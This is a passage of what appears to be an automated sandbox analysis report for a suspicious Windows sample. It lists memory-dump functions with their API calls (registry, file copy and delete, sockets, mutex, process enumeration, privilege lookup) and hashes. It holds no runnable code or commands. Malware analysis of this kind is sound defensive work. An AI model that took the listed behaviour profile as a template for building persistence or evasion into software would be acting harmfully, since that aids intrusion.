                                              • Instruction Fuzzy Hash: 42319F75509780AFE716CF25DC85F56FFE8EF06210F08849AE984CB292D375A909CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02341EF4, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: FileView
                                              • String ID:
                                              • API String ID: 3314676101-0
                                              • Opcode ID: 1a908d8a50e8af6c6aface0a41840f9843b3d15a233d8d4cf96bb00badbee836
                                              • Instruction ID: 2947de527aeef6cd0765cc0f702bc366de7176c57c064c00b9c8fba4a8775376
                                              • Opcode Fuzzy Hash: 1a908d8a50e8af6c6aface0a41840f9843b3d15a233d8d4cf96bb00badbee836
                                              • Instruction Fuzzy Hash: EA31C2B2404780AFE722CB55DC45F96FFF8EF06320F04859AE9849B252D365A949CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023404AB, Relevance: 1.6, APIs: 1, Instructions: 86registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegQueryValueExW.KERNELBASE(?,00000E2C,9CB165A5,00000000,00000000,00000000,00000000), ref: 0234055C
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: QueryValue
                                              • String ID:
                                              • API String ID: 3660427363-0
                                              • Opcode ID: 7fcef379c9b0162784d2a0ef438e12bae253e843d29e12a7e4077301578146d4
                                              • Instruction ID: 7eff22ab403168f2fad9305f6d34a58d97163595618b93a2ca1ec1cebe1466e6
                                              • Opcode Fuzzy Hash: 7fcef379c9b0162784d2a0ef438e12bae253e843d29e12a7e4077301578146d4
                                              • Instruction Fuzzy Hash: D8317172109784AFD7228B65DC44F52BFF8EF06310F0885DAEA859B162D364A909CB71
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023402AB, Relevance: 1.6, APIs: 1, Instructions: 79registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExA.KERNELBASE(?,00000E2C), ref: 02340353
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: Open
                                              • String ID:
                                              • API String ID: 71445658-0
                                              • Opcode ID: 26b3ecaa074daff1b07d30bfdb1377651f803fe274aad9de42a79abec9cb8b85
                                              • Instruction ID: ceee6bd08dc580af2366dcfd9a2ae302b0a9757cc35bd45411245c00f84d2e5d
                                              • Opcode Fuzzy Hash: 26b3ecaa074daff1b07d30bfdb1377651f803fe274aad9de42a79abec9cb8b85
                                              • Instruction Fuzzy Hash: 0621A676009380AFE7228F20DC41FA6FFB4EF06314F1884DAE9849B192D365A909C771
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02341E12, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenFileMappingW.KERNELBASE(?,?), ref: 02341E9D
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: FileMappingOpen
                                              • String ID:
                                              • API String ID: 1680863896-0
                                              • Opcode ID: c8a223eca769dd335b3af39e79521e76d06ad679215ebf5467a04f27c641da76
                                              • Instruction ID: c2721bb054851a23675957a669697552a18a9f9c285e13685c6578518fa123a7
                                              • Opcode Fuzzy Hash: c8a223eca769dd335b3af39e79521e76d06ad679215ebf5467a04f27c641da76
                                              • Instruction Fuzzy Hash: 2121BF71508380AFE721CB65CC45F66FFE8EF05620F08849EE9848B242D375E848CB71
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023408F0, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileType.KERNELBASE(?,00000E2C,9CB165A5,00000000,00000000,00000000,00000000), ref: 02340985
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: FileType
                                              • String ID:
                                              • API String ID: 3081899298-0
                                              • Opcode ID: 9eb5fb14afe8f109b1bc81d9e5ebc4894d33aea99aca1e07b32ce7359a8c2e07
                                              • Instruction ID: 4826325120c2862867fd79f9cc26b7c77676caa2b8b9d5e29f83fc276610bc3d
                                              • Opcode Fuzzy Hash: 9eb5fb14afe8f109b1bc81d9e5ebc4894d33aea99aca1e07b32ce7359a8c2e07
                                              • Instruction Fuzzy Hash: 1C21B6B65087846FE7128B25DC41FA6BFB8EF46720F1880DBED849B163D264A905C771
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02341582, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WSASocketW.WS2_32(?,?,?,?,?), ref: 0234160E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: Socket
                                              • String ID:
                                              • API String ID: 38366605-0
                                              • Opcode ID: 58878822bd1dd3f2cfd77214796e79ccb01a5a73695131f877f314d30015247b
                                              • Instruction ID: 1c7f1273016bc8825c86ee9eb8644bd5b35e36405e40e253ac508e843b59bee3
                                              • Opcode Fuzzy Hash: 58878822bd1dd3f2cfd77214796e79ccb01a5a73695131f877f314d30015247b
                                              • Instruction Fuzzy Hash: AE21BF71504780AFEB22CF61DC45F96FFF8EF05220F08849EEA849B252D375A408CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0234081A, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 02340899
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 6940c0797f6de7c03ea2f1b1dde33d50e1941e9eaad3c66956145798aa7c202a
                                              • Instruction ID: c065e8b9d1dc7594a2013fb0e08dcd9876ae23c5694e4828fe96e2d556db50ab
                                              • Opcode Fuzzy Hash: 6940c0797f6de7c03ea2f1b1dde33d50e1941e9eaad3c66956145798aa7c202a
                                              • Instruction Fuzzy Hash: 9B219A71600204AFEB29DF65CD85F66FBE8EF08210F1484AAEA858B252D771E404CBB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02340C58, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DeleteFileA.KERNELBASE(?,00000E2C), ref: 02340CEF
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: d921f38f3d17b9d7169fe89b63bdbdd1e0aaeeb9e58cfea83d817dc955028fc0
                                              • Instruction ID: 75b3fc3d53c457ac0d6e6fe3bc553a47ec30622cf54be31f8084e1d64d291f39
                                              • Opcode Fuzzy Hash: d921f38f3d17b9d7169fe89b63bdbdd1e0aaeeb9e58cfea83d817dc955028fc0
                                              • Instruction Fuzzy Hash: 2F21F571204380AFE7218B25DC45FA6BFA8DF42310F1880DAEE848F292D365A909CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02340B79, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegSetValueExW.KERNELBASE(?,00000E2C,9CB165A5,00000000,00000000,00000000,00000000), ref: 02340C10
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: Value
                                              • String ID:
                                              • API String ID: 3702945584-0
                                              • Opcode ID: fa8a66723ba903d51ff735cec54ae0619e15a862dccb5daabb1ca98cb879953a
                                              • Instruction ID: 7c7d17a5fa7e8a2901dea5deda44554ea42fe01f08f775cb8db7a55a0adbaa44
                                              • Opcode Fuzzy Hash: fa8a66723ba903d51ff735cec54ae0619e15a862dccb5daabb1ca98cb879953a
                                              • Instruction Fuzzy Hash: FB21BDB2504740AFE7218F25CC84F57BFE8EF05310F08849AEA859B252D360E908CB71
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023409C0, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                              Download Yara Rule
                                              APIs
                                              • setsockopt.WS2_32(?,00000E2C,9CB165A5,00000000,00000000,00000000,00000000), ref: 02340A51
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: setsockopt
                                              • String ID:
                                              • API String ID: 3981526788-0
                                              • Opcode ID: ad00604c0cb3cc09be3b8e1e96342be9d88e166477bd1472480cb568e404e316
                                              • Instruction ID: 577ca61ce88198a9f73eb895fd4f621b2ce3d400d720cbee59ea457e5712a83b
                                              • Opcode Fuzzy Hash: ad00604c0cb3cc09be3b8e1e96342be9d88e166477bd1472480cb568e404e316
                                              • Instruction Fuzzy Hash: C221A172509380AFEB228F65DC44F56BFB8EF46314F0884DBEA849B153D265A509CB72
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023403CA, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegQueryValueExA.KERNELBASE(?,00000E2C), ref: 0234045E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: QueryValue
                                              • String ID:
                                              • API String ID: 3660427363-0
                                              • Opcode ID: 56118cbdbdb46ab80f3fe41e2c2b480e1ae15d63c5841f95b90d31d7c2ad07b2
                                              • Instruction ID: 5105140fcb45e5533391d5945bff9364396e9884e0c45f327acf897163494686
                                              • Opcode Fuzzy Hash: 56118cbdbdb46ab80f3fe41e2c2b480e1ae15d63c5841f95b90d31d7c2ad07b2
                                              • Instruction Fuzzy Hash: 4221F272200204AFFB218F15DC41FA6FBECEF04710F10895AEE459A281D7B1A509CFB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0234012A, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateMutexW.KERNELBASE(?,?), ref: 0234019D
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: CreateMutex
                                              • String ID:
                                              • API String ID: 1964310414-0
                                              • Opcode ID: 5d88054f4d93cf27d72bd12cdd6de8b5ada7ac6e481c9af5f1e23c19fd611d01
                                              • Instruction ID: eb95bf571c1569ecd81a2c655a2008f67da440110a58ae5bd338c94b49682bd4
                                              • Opcode Fuzzy Hash: 5d88054f4d93cf27d72bd12cdd6de8b5ada7ac6e481c9af5f1e23c19fd611d01
                                              • Instruction Fuzzy Hash: C5218B75600240AFE728DF25DC85F6AFBE8EF05620F1484AAEE498B242E775E505CB71
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02340723, Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateDirectoryW.KERNELBASE(?,?), ref: 0234079F
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: CreateDirectory
                                              • String ID:
                                              • API String ID: 4241100979-0
                                              • Opcode ID: f143725fecffdfa45bc91d1064d31886bd0150f0cf61a9d26b577d80c465525b
                                              • Instruction ID: 094e08ad5166439a2ff51e2c68e3a12c4bb2809f51bb4a0e6bc20ed2e28a412e
                                              • Opcode Fuzzy Hash: f143725fecffdfa45bc91d1064d31886bd0150f0cf61a9d26b577d80c465525b
                                              • Instruction Fuzzy Hash: 3E21B0B25093809FD716CF25DC84B52BFE8EF06214F0980EAE944CF252E774E908CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02340A9B, Relevance: 1.6, APIs: 1, Instructions: 71fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CopyFileW.KERNELBASE(?,?,?), ref: 02340B1E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: CopyFile
                                              • String ID:
                                              • API String ID: 1304948518-0
                                              • Opcode ID: f052feb2d0f60b102cfd6bb134ffaf4ce41beebb7c63d9c787869a977c3f2499
                                              • Instruction ID: 1333320d62f8e9c3699ed9312253ca95217882940a6f5a70b886e77e40b98013
                                              • Opcode Fuzzy Hash: f052feb2d0f60b102cfd6bb134ffaf4ce41beebb7c63d9c787869a977c3f2499
                                              • Instruction Fuzzy Hash: B42183B15093845FDB12CF25DC55B52BFE8EF06214F0880DAED44DB253E665E904C771
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02341E32, Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenFileMappingW.KERNELBASE(?,?), ref: 02341E9D
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: FileMappingOpen
                                              • String ID:
                                              • API String ID: 1680863896-0
                                              • Opcode ID: 389026b8df8f8ae48bc75dfcf081c5b54fbd8649c3f200841a0d26aa9cc228e3
                                              • Instruction ID: 554cb41caca1b425cf921fd35ad95caff33373326ded3f88c01e25c031ac1277
                                              • Opcode Fuzzy Hash: 389026b8df8f8ae48bc75dfcf081c5b54fbd8649c3f200841a0d26aa9cc228e3
                                              • Instruction Fuzzy Hash: 4021C075500600AFE720DF65DC45F66FBE8EF04720F1484AAED888B242D7B5E448CB72
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02341170, Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                              Download Yara Rule
                                              APIs
                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 023411DC
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: ChangeCloseFindNotification
                                              • String ID:
                                              • API String ID: 2591292051-0
                                              • Opcode ID: e26d3b02afe55f1d87911825e097cf17ff59cc978a0d64b52557331cb503e465
                                              • Instruction ID: e427d35ee82b68f6cd0143463510efab6c70c189e9b551d24b65f95ad4f56413
                                              • Opcode Fuzzy Hash: e26d3b02afe55f1d87911825e097cf17ff59cc978a0d64b52557331cb503e465
                                              • Instruction Fuzzy Hash: 8C21AE725093C05FEB028B25DC54B92BFE4AF47224F0980DAED858F663D274A908CB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02341F32, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: FileView
                                              • String ID:
                                              • API String ID: 3314676101-0
                                              • Opcode ID: 82cc393c4e8af05079da5bae864590100d4262d6fa37b26bcddfc6142796a599
                                              • Instruction ID: 9576852039eb83e9b12d8c0fc2050f3b0bc5179c34556b24bb9366933a35fd19
                                              • Opcode Fuzzy Hash: 82cc393c4e8af05079da5bae864590100d4262d6fa37b26bcddfc6142796a599
                                              • Instruction Fuzzy Hash: 7621DE71500700AFE721CF55DC84F96FBE8EF08320F14869AEA889B641D775B449CB71
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02341225, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                              Download Yara Rule
                                              APIs
                                              • K32EnumProcesses.KERNEL32(?,?,?,9CB165A5,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 02341296
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: EnumProcesses
                                              • String ID:
                                              • API String ID: 84517404-0
                                              • Opcode ID: f38daa94be4ecf41125344b6f1251b1ed81bbdce49a166fad590dcbbeeb2d233
                                              • Instruction ID: 4dbc82092bda38da63f88a24c852424628c599ccde9f2bd55fd77552a2e578df
                                              • Opcode Fuzzy Hash: f38daa94be4ecf41125344b6f1251b1ed81bbdce49a166fad590dcbbeeb2d233
                                              • Instruction Fuzzy Hash: D02150715093849FD712CF65DC45B92BFE8EF06210F0984EAED89DB162D374A948CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023415A2, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WSASocketW.WS2_32(?,?,?,?,?), ref: 0234160E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: Socket
                                              • String ID:
                                              • API String ID: 38366605-0
                                              • Opcode ID: 8b9a3d12f31f6ceffa370e4d500308ff4e13bae33453b5090557046d1e0a6cd5
                                              • Instruction ID: ed700943fb7f47f7d5076fd1f2f97a7e4331259ddd59365567925492bd02f227
                                              • Opcode Fuzzy Hash: 8b9a3d12f31f6ceffa370e4d500308ff4e13bae33453b5090557046d1e0a6cd5
                                              • Instruction Fuzzy Hash: 4321CF71500600AFEB21DF65DC45F56FFE8EF04320F1884AAEE898B642D775A408CB71
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023401F4, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                              Download Yara Rule
                                              APIs
                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 02340264
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: ChangeCloseFindNotification
                                              • String ID:
                                              • API String ID: 2591292051-0
                                              • Opcode ID: 8a1ac8a9b5754a451f220bcbed06b4b34ac109efa5e0c9f0e02d8daad5e54a13
                                              • Instruction ID: ee4a35b866faa937194e766b5cc9233da2ddc3c70713ade22fd0dab06a533589
                                              • Opcode Fuzzy Hash: 8a1ac8a9b5754a451f220bcbed06b4b34ac109efa5e0c9f0e02d8daad5e54a13
                                              • Instruction Fuzzy Hash: 7221D1B2505784AFD716CF24DC85B52BFA8EF42324F0880DAED849F593D334A909CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02340B9E, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegSetValueExW.KERNELBASE(?,00000E2C,9CB165A5,00000000,00000000,00000000,00000000), ref: 02340C10
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: Value
                                              • String ID:
                                              • API String ID: 3702945584-0
                                              • Opcode ID: 41f54964deb8e902cf79fb5b7cd3d7910431bc91736cea3aeddb72f4f69ffac8
                                              • Instruction ID: 2cfc0c605cd1ceb443711c5d14a5cc1eb77bc4ce8b16ed1d5ee44768d3e31f59
                                              • Opcode Fuzzy Hash: 41f54964deb8e902cf79fb5b7cd3d7910431bc91736cea3aeddb72f4f69ffac8
                                              • Instruction Fuzzy Hash: B3118E72600604EFEB249E25DC81F67FBECEF04714F14849AEE459B642DB64F909CA71
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023404EA, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegQueryValueExW.KERNELBASE(?,00000E2C,9CB165A5,00000000,00000000,00000000,00000000), ref: 0234055C
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: QueryValue
                                              • String ID:
                                              • API String ID: 3660427363-0
                                              • Opcode ID: 51c491d6e9aafa700ff2a53ed47752dde9843256fd773250dcd7e7bb2c909d74
                                              • Instruction ID: 9bb0950115fac409af0704d6e563ec34af275d02a0010eb54c9ac568c0084861
                                              • Opcode Fuzzy Hash: 51c491d6e9aafa700ff2a53ed47752dde9843256fd773250dcd7e7bb2c909d74
                                              • Instruction Fuzzy Hash: 82117F72604604AEEB24CF25DC84F67FBECEF04720F14849AEA459B252D760F509CB71
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02340E9C, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                              Download Yara Rule
                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 02340F06
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: 137064db4db1bd393c0a3d0f830ec93300891933d7c232131e1a4cad0e32f453
                                              • Instruction ID: e9da5beabd1a6bb13b091744bbeb518b03d014cc538a184d3307b314c08a269f
                                              • Opcode Fuzzy Hash: 137064db4db1bd393c0a3d0f830ec93300891933d7c232131e1a4cad0e32f453
                                              • Instruction Fuzzy Hash: 3611A2726043809FD715CF25DC85B56BFE8EF05210F0884EAED49CB252D374E848CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0234239E, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessTimes.KERNELBASE(?,00000E2C,9CB165A5,00000000,00000000,00000000,00000000), ref: 023423FD
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: ProcessTimes
                                              • String ID:
                                              • API String ID: 1995159646-0
                                              • Opcode ID: d9ea4638ce16056a54791c0492cdfd3bfd9d1a1f05d56562217cb6452353947c
                                              • Instruction ID: 277d2a5ae9e0c9cc4e69d5b36bcf9be20bb9d7d8a1c2870fe6a57b12dfd40c9a
                                              • Opcode Fuzzy Hash: d9ea4638ce16056a54791c0492cdfd3bfd9d1a1f05d56562217cb6452353947c
                                              • Instruction Fuzzy Hash: 74119072500604AFEB21CF65DC45F6BFBE8EF05320F1484ABEE459B651D674A408CB71
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02340C86, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DeleteFileA.KERNELBASE(?,00000E2C), ref: 02340CEF
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 207332c45989247c2c2cc4c4e8d26311ea4ded6fe9632d10c91e0e1361e04778
                                              • Instruction ID: 874d4c75a53a55e5443f911011c5c5c5b04bc58d6cffe8f95f5a3aa7d4e77f8a
                                              • Opcode Fuzzy Hash: 207332c45989247c2c2cc4c4e8d26311ea4ded6fe9632d10c91e0e1361e04778
                                              • Instruction Fuzzy Hash: F3110671200204AFF7249B25DC41F66FBD8DF05720F1480ABEE059A285D6B5B948CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023409F2, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                              Download Yara Rule
                                              APIs
                                              • setsockopt.WS2_32(?,00000E2C,9CB165A5,00000000,00000000,00000000,00000000), ref: 02340A51
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: setsockopt
                                              • String ID:
                                              • API String ID: 3981526788-0
                                              • Opcode ID: 3597b15e7da985962ddce528c57eb4174fda7188e4899d30968a787440e1d9a4
                                              • Instruction ID: 6bb9d9dc07d6cc68adf8fdb983cb9d30d915ba421907e10a5d9553227d42e8df
                                              • Opcode Fuzzy Hash: 3597b15e7da985962ddce528c57eb4174fda7188e4899d30968a787440e1d9a4
                                              • Instruction Fuzzy Hash: FD11BF72500204AEEB21CF55DC85F6AFBE8EF04320F1484ABEE499B251D674A508CBB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023402DE, Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExA.KERNELBASE(?,00000E2C), ref: 02340353
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: Open
                                              • String ID:
                                              • API String ID: 71445658-0
                                              • Opcode ID: 4b72c471f92e1e38edceb008ed456841f801f4b893ce0b4c57ed5d6da5e3473d
                                              • Instruction ID: bd52533731fad5d06f43bca4b73cc53de6199bbaac6dc831f0a0a90423fdf002
                                              • Opcode Fuzzy Hash: 4b72c471f92e1e38edceb008ed456841f801f4b893ce0b4c57ed5d6da5e3473d
                                              • Instruction Fuzzy Hash: 1411EC32100600EFEB218F14DC81F6AFFE8EF04724F14849AEE455A292C6B1B508CBB2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02340D33, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSystemInfo.KERNELBASE(?), ref: 02340D98
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: InfoSystem
                                              • String ID:
                                              • API String ID: 31276548-0
                                              • Opcode ID: 5b6fa5e21051f940e13e84fd392ac06ed4430762bf3419a1538c339eea51539f
                                              • Instruction ID: 88f4b8904a997ed185df5dd777948c51abc80c9b859026d8d68283336f33dad9
                                              • Opcode Fuzzy Hash: 5b6fa5e21051f940e13e84fd392ac06ed4430762bf3419a1538c339eea51539f
                                              • Instruction Fuzzy Hash: B4118E714093C0AFD7128B24DC44B92BFB4EF02224F0984EBED848F153D275A949CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02340EBE, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                              Download Yara Rule
                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 02340F06
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: 34d53d311ec0c997826bfa5cb3fbf26d098816011ede95939d02afa5c40f93b0
                                              • Instruction ID: 0f0dfc1a43bbf5a947dcbeafd9ec3a840f47d0669dcca916010c1c9b1b8e2fa2
                                              • Opcode Fuzzy Hash: 34d53d311ec0c997826bfa5cb3fbf26d098816011ede95939d02afa5c40f93b0
                                              • Instruction Fuzzy Hash: B711A1726047009FDB18CF29D885B56FBD8EF04720F0885AAEE09CB642EB74E404CB71
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02340AD6, Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CopyFileW.KERNELBASE(?,?,?), ref: 02340B1E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: CopyFile
                                              • String ID:
                                              • API String ID: 1304948518-0
                                              • Opcode ID: 34d53d311ec0c997826bfa5cb3fbf26d098816011ede95939d02afa5c40f93b0
                                              • Instruction ID: 293ed640d979b76eb23e8e3896f778adb147e0bfc6d2dcf1b439099f9d2873ac
                                              • Opcode Fuzzy Hash: 34d53d311ec0c997826bfa5cb3fbf26d098816011ede95939d02afa5c40f93b0
                                              • Instruction Fuzzy Hash: A511A1716002049FDB58CF29D885B56FBD8EF04224F1884AADE49CB642EB74E404CB75
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02340932, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileType.KERNELBASE(?,00000E2C,9CB165A5,00000000,00000000,00000000,00000000), ref: 02340985
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: FileType
                                              • String ID:
                                              • API String ID: 3081899298-0
                                              • Opcode ID: 9a9856a82a993dc81c67ec9f68f98ff638f5c05409b71c3ef0425b14a440de7b
                                              • Instruction ID: 9d97f9709b49540b696445714f456885519eaef76cfe0a4db0b208c82e9a6e60
                                              • Opcode Fuzzy Hash: 9a9856a82a993dc81c67ec9f68f98ff638f5c05409b71c3ef0425b14a440de7b
